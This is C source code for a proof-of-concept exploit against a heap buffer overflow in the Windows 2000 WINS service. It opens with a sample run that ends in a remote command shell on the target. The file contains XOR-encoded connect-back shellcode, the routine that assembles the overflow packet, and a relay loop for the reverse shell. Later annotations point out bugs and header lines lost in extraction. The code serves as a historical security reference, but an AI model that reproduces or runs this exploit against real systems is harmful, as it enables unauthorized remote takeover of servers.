////////////////////////////////////////////////////////// /* Windows Internet Name Service (WINS) Remote Heap Buffer Overflow WinsE.exe v1.0, written by beiyu WinsE.exe test on win2000 tw cn en sp4 and sp0, other not test pubwinse.exe 10.0.0.239 42 10.0.0.111 22222 # connected # Bind port on 10.0.0.111:22222 success # send packet ########## SHELL! ########## Microsoft Windows 2000 [ª©¥» 5.00.2195] (C) Copyright 1985-1999 Microsoft Corp. C:\WINNT\system32> C:\WINNT\system32>ipconfig -all ipconfig -all Windows 2000 IP Configuration Host Name . . . . . . . . . . . . : twgroup1-bfhc30 Primary DNS Suffix . . . . . . . : Node Type . . . . . . . . . . . . : Hybrid IP Routing Enabled. . . . . . . . : No WINS Proxy Enabled. . . . . . . . : No Ethernet adapter °Ï°ì³s½u: Connection-specific DNS Suffix . : Description . . . . . . . . . . . : AMD PCNET Family PCI Ethernet Adapter Physical Address. . . . . . . . . : 00-0C-29-03-84-D2 DHCP Enabled. . . . . . . . . . . : No IP Address. . . . . . . . . . . . : 10.0.0.239 Subnet Mask . . . . . . . . . . . : 255.0.0.0 Default Gateway . . . . . . . . . : 10.0.0.1 DNS Servers . . . . . . . . . . . : 10.0.0.1 C:\WINNT\system32>exit # Connection closed ########## SHELL OVER! 
########## */
////////////////////////////////////////////////////////////
/*
 * Proof-of-concept for the WINS heap overflow named in the header comment.
 * Connects to argv[1]:argv[2], sends a single crafted request, and waits on
 * argv[3]:argv[4] for the target to connect back, then relays that session
 * to the console.  Windows/Winsock only (WSAStartup, closesocket, Sleep).
 */
// NOTE(review): the three header names below were lost in extraction (bare
// "#include" directives); the original presumably pulled in the C runtime
// headers for printf/malloc/memcpy — confirm against the original file.
#include
#include
#include
#include "winsock2.h"
#pragma comment(lib, "ws2_32")
// 12-byte fixed header that starts the request sent to the target port.
char head [] = "\x00\x00\x23\xf8\x29\x00\xff\x23\x05\x39\x1e\xc8";
// Two 4-byte values repeated in a fixed 9:14 pattern to build the 920-byte
// block that follows the header (see the nested loop in main()).
char addr1[] = "\x68\x22\x39\x05";
char addr2[] = "\x7c\xf4\x3d\x05";
// 399 bytes are copied from this array (the last one is the literal's
// terminating NUL).  Per the author's comments the body is XOR-encoded with
// 0x99; main() patches the connect-back address at offset 193 (4 bytes) and
// the port at offset 200 (2 bytes), both XOR 0x99 to match the encoding.
char shellcoode[] =
"\xeb\x10\x5a\x4a\x33\xc9\x66\xb9\x77\x01\x80\x34\x0a\x99\xe2\xfa"
"\xeb\x05\xe8\xeb\xff\xff\xff" //decode xor 0x99
"\xcd\x12\x75\x1a\x75\xb1\x12\x6d\x71"
"\x60\x99\x99\x99\x10\x9f\x66\xaf\xf1\x17\xd7\x97\x75\x71\x9d\x98"
"\x99\x99\x10\xdf\x9d\x66\xaf\xf1\xeb\x67\x2a\x8f\x71\x6c\x99\x99"
"\x99\x10\xdf\x91\x66\xaf\xf1\x76\x57\x79\xf9\x71\x7f\x99\x99\x99"
"\x10\xdf\x95\xf1\xaa\xab\x99\x99\xf1\xee\xea\xab\xc6\xcd\x66\xcf"
"\x9d\x10\xdf\x89\x66\xef\x89\xf1\x40\x90\x6c\x34\x71\x5c\x99\x99"
"\x99\x10\xdf\x8d\x66\xef\x89\xf1\x75\x60\x33\xf9\x71\x2c\x99\x99"
"\x99\x10\xdf\x81\x66\xef\x89\xf1\x7e\xe0\x5f\xe0\x71\x3c\x99\x99"
"\x99\x10\xdf\x85\x66\xef\x89\xf1\x52\x74\x65\xa2\x71\x0c\x99\x99"
"\x99\x10\xdf\xb9\x18\x75\x09\x98\x99\x99\xcd\xf1\x98\x98\x99\x99"
"\x66\xcf\xb9\xc9\xc9\xc9\xc9\xd9\xc9\xd9\xc9\x66\xcf\x8d\x12\x41"
"\xf1"
"\x93\x99\x99\xf6" //bcip xor 0x99 (offset 193, overwritten by main())
"\xf1\x9b\x99"
"\xbe\x96" //bcport xor 0x99 (offset 200, overwritten by main())
"\x12\x55\xf3\x89\xc8\xca"
"\x66\xcf\x81\x1c\x59\xec\xda\xf1\xfa\xf4\xfd\x99\x10\xff\xa9\x1a"
"\x75\xcd\x14\xa5\xbd\xaa\x50\x1a\x58\x8c\x32\x7b\x64\x5f\xdd\xbd"
"\x89\xdd\x67\xdd\xbd\xa4\x10\xc5\xbd\xd1\x10\xc5\xbd\xd5\x10\xc5"
"\xbd\xc9\x14\xdd\xbd\x89\xcd\xc9\xc8\xc8\xc8\xf3\x98\xc8\xc8\x66"
"\xef\xa9\xc8\x66\xcf\x91\xca\x66\xcf\x85\x66\xcf\x95\xcc\xcf\xfd"
"\x38\xa9\x99\x99\x99\x12\xd9\x95\x12\xe9\x85\x34\x12\xf1\x91\x12"
"\x5c\xc7\xc4\x5b\x9d\x99\xca\xcc\xcf\xce\x12\xf5\xbd\x81\x12\xdc"
"\xa5\x12\xcd\x9c\xe1\x9a\x4c\x12\xd3\x81\x12\xc3\xb9\x9a\x44\x7a"
"\xab\xd0\x12\xad\x12\x9a\x6c\xaa\x66\x65\xaa\x59\x35\xa3\x5d\xed"
"\x9e\x58\x56\x94\x9a\x61\x72\x6b\xa2\xe5\xbd\x8d\xec\x78\x12\xc3"
"\xbd\x9a\x44\xff\x12\x95\xd2\x12\xc3\x85\x9a\x44\x12\x9d\x12\x9a"
"\x5c\x72\x9b\xaa\x59\x12\x4c\xc6\xc7\xc4\xc2\x5b\x9d\x99\x00";
/*
 * Print the usage banner.  `us` (argv[0]) is not used.
 * NOTE(review): the argument list in the second printf appears to have been
 * lost in extraction (angle-bracketed placeholders stripped) — confirm against
 * the original file.
 */
void usage(char* us)
{
    printf(" \n");
    printf("# WinsE.exe v1.0, written by beiyu\n");
    printf("# WinsE.exe \n");
    printf("# test on win2000 tw cn en sp4 and sp0, other not test\n\n");
    return;
}
/*
 * Relay loop between stdin/stdout and the connected socket.  Returns when
 * either side closes, a read/write fails, or the local input starts with
 * "exit".
 *
 * ul[] is handed to select() cast to fd_set: ul[0] = 1 and ul[1] = sock
 * presumably mirror the Winsock fd_set layout (fd_count followed by
 * fd_array[]), so this cast is Winsock-specific.  Winsock ignores select()'s
 * first argument.
 */
void shell (int sock)
{
    int l;
    char buf[512];
    struct timeval time;      // shadows time() from <time.h>
    unsigned long ul[2];
    time.tv_sec = 1;
    time.tv_usec = 0;
    while (1) {
        ul[0] = 1;
        ul[1] = sock;
        // Wait up to one second for the socket to become readable.
        l = select (0, (fd_set *)&ul, NULL, NULL, &time);
        if(l == 1) {
            l = recv (sock, buf, sizeof (buf), 0);
            if (l <= 0) {
                printf ("# Connection closed\r\n");
                return;
            }
            l = write (1, buf, l);
            if (l <= 0) {
                printf ("# Connection closed\r\n");
                return;
            }
        } else {
            // Nothing readable (timeout or select error): block on stdin and
            // forward whatever arrives.
            l = read (0, buf, sizeof (buf));
            if (l <= 0) {
                printf("# Connection closed\r\n");
                return;
            }
            l = send(sock, buf, l, 0);
            if (l <= 0) {
                printf("# Connection closed\r\n");
                return;
            }
            // Compares the first 4 bytes of buf even when fewer than 4 were
            // just read (stale bytes from an earlier iteration are compared).
            if(memcmp(buf,"exit",4) == 0) {
                printf("# Connection closed\r\n");
                return;
            }
        }
    }
}
/*
 * argv[1], argv[2]: target host and port.
 * argv[3], argv[4]: host and port this program listens on for the connect-back.
 *
 * Returns 0 after the session (or if the connect-back never arrives), -1 on
 * argument, Winsock, socket, select or send errors; exit(-1) if the listening
 * socket cannot be created.
 */
int main(int argc,char *argv[])
{
    unsigned long cbip;
    unsigned short cbport;
    char ip[128];
    unsigned short port;
    WSADATA wsadata;
    SOCKET s;
    fd_set mask;
    struct timeval timeout;
    struct sockaddr_in server;
    char* sendpacket;
    char* addr;
    if (argc!=5) {
        usage(argv[0]);
        return -1;
    }
    //04045.exe
    if (WSAStartup(MAKEWORD(2,0),&wsadata)!=0) {
        printf("# wsastartup error\n");
        return -1;
    }
    s=socket(AF_INET,SOCK_STREAM,0);
    if (s==-1) {
        printf("# socket error\n");
        return -1;
    }
    // Unbounded copy of argv[1] into a 128-byte buffer.
    strcpy(ip, argv[1]);
    port = atoi(argv[2]);
    // Connect-back address and port, XOR 0x99 so they match the encoded
    // shellcode body; patched in at the offsets noted on the array above.
    cbip = inet_addr(argv[3])^0x99999999;
    cbport = htons(atoi(argv[4]))^(USHORT)0x9999;
    memcpy(&shellcoode[193], &cbip, 4);
    memcpy(&shellcoode[200], &cbport, 2);
    server.sin_family=AF_INET;
    server.sin_addr.s_addr=inet_addr(ip);
    server.sin_port=htons(port);
    // Return value ignored.  The socket is never switched to non-blocking, so
    // this call itself blocks; the select() timeout below only runs afterwards.
    connect(s,( struct sockaddr *)&server,sizeof(server));
    timeout.tv_sec=3;
    timeout.tv_usec=0;
    FD_ZERO(&mask);
    FD_SET(s,&mask);
    switch(select(s+1,NULL,&mask,NULL,&timeout)) {
    case -1: {
        printf("# select error\n");
        closesocket(s);
        return -1;
    }
    case 0: {
        printf("# connection failed\n");
        closesocket(s);
        return -1;
    }
    default:
        if(FD_ISSET(s,&mask)) {
            printf("# connected\n");
            // Listener for the connect-back, bound to argv[3]:argv[4].
            struct sockaddr_in sa, client;
            SOCKET socklisten;
            socklisten=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
            if(socklisten == INVALID_SOCKET) {
                printf("# Create socket failed:%d\r\n",GetLastError());
                exit(-1);
            }
            sa.sin_family=AF_INET;
            sa.sin_port=htons(atoi(argv[4]));
            sa.sin_addr.S_un.S_addr=inet_addr(argv[3]);
            int Reuse;   // never initialized: setsockopt() reads an indeterminate value (UB)
            setsockopt(socklisten, SOL_SOCKET, SO_REUSEADDR, (char*)&Reuse, sizeof(Reuse));
            // On bind failure the listener is closed but execution continues
            // below.  The error printf also mismatches its format string: cbip
            // (unsigned long) is passed for %s and cbport for %d — UB.
            if(bind(socklisten,(LPSOCKADDR)&sa,sizeof(sa))==SOCKET_ERROR) {
                printf("# Bind port on %s:%d error:%d\r\n", cbip, cbport,GetLastError());
                closesocket(socklisten);
            } else {
                printf("# Bind port on %s:%d success\r\n", argv[3], atoi(argv[4]));
                listen(socklisten, 1);
            }
            // Assemble the request.  Bytes on the wire, in order (cumulative
            // sendlen in parentheses):
            //   head        12 bytes                                   (12)
            //   addr        920 bytes: 10 x (9 x addr1 + 14 x addr2)  (932)
            //   nop         180 x 0x90                                (1112)
            //   shellcoode  399 bytes                                  (1511)
            //   last        7701 x 0x90                               (9212)
            // malloc() results are not checked and the buffers are never freed.
            sendpacket = (char*)malloc(65535);
            memset(sendpacket, 0, 65535);
            char last[7701] = {0};
            memset(last,'\x90', 7701);
            /* \x68\x22\x39\x05 * 9 *10 + \x7c\xf4\x3d\x05 * 14 * 10
               char addr1[] = "\x68\x22\x39\x05";
               char addr2[] = "\x7c\xf4\x3d\x05";
            */
            addr = (char*)malloc(1024);
            memset(addr, 0, 1024);
            char* nop;
            nop = (char*)malloc(180);
            memset(nop, '\x90', 180);
            int tt = 0;   // bytes written into addr; ends at 920
            for(int k = 0; k < 10; k++) {
                for(int t = 0; t < 9; t++) {
                    memcpy(addr + tt, addr1, 4);
                    tt += 4;
                }
                for(int j = 0; j < 14; j++) {
                    memcpy(addr + tt, addr2, 4);
                    tt += 4;
                }
            }
            // printf("tt is %d\n", tt);
            int sendlen = 0;
            memcpy(sendpacket + sendlen, head, 12);
            sendlen += 12;
            memcpy(sendpacket + sendlen, addr, tt);
            sendlen += tt;
            memcpy(sendpacket + sendlen, nop, 180);
            sendlen += 180;
            memcpy(sendpacket + sendlen, shellcoode, 399);
            sendlen += 399;
            memcpy(sendpacket + sendlen, last, 7701);
            sendlen += 7701;
            printf("# send packet\n");
            if (send(s,sendpacket,sendlen,0)==-1) {
                printf("# sending error, the server prolly rebooted.\n");
                return -1;
            }
            Sleep(1000);
            // printf("# get shell\n");
            int len = sizeof(client);
            // Blocks until something connects to the listener; yields
            // INVALID_SOCKET if the listener was closed after a failed bind().
            SOCKET sockback = accept(socklisten, (struct sockaddr*)&client, &len);
            if(sockback != INVALID_SOCKET) {
                // printf("# Exploit success! Get the Shell!\r\n");
                printf(" ########## SHELL! ##########\r\n\r\n");
                shell(sockback);
                closesocket(sockback);
                closesocket(socklisten);
            }
            closesocket(s);
            WSACleanup();
            printf("\r\n ########## SHELL OVER! ##########\r\n");
            return 0;
        }
    }
    // Reached only when select() reported readiness but FD_ISSET was false.
    closesocket(s);
    WSACleanup();
    return 0;
}